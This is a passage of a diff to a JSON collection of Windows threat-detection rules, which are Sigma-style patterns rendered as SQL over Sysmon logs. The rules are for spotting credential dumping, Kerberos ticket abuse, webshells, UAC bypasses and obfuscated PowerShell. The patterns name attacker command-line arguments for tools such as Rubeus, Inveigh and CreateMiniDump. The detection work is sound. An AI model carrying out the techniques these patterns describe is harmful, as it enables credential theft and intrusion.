An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - 
"status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": 
"Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a 
user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR 
(CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' 
OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": 
"fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": 
"proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE 
'%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage 
